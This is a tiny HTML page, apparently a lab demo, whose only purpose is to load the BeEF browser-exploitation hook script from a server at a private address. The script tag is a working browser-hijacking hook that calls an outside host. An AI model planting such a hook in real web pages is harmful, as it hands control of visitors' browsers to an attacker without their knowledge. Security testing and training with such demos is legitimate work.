<html> <head> <title> Example BeEF hooked page </title> </head> <body> <p>This page should be running the hook script for BeEF</p> <script src="http://10.0.2.15:3000/hook.js"></script> </body></html>
1234567891011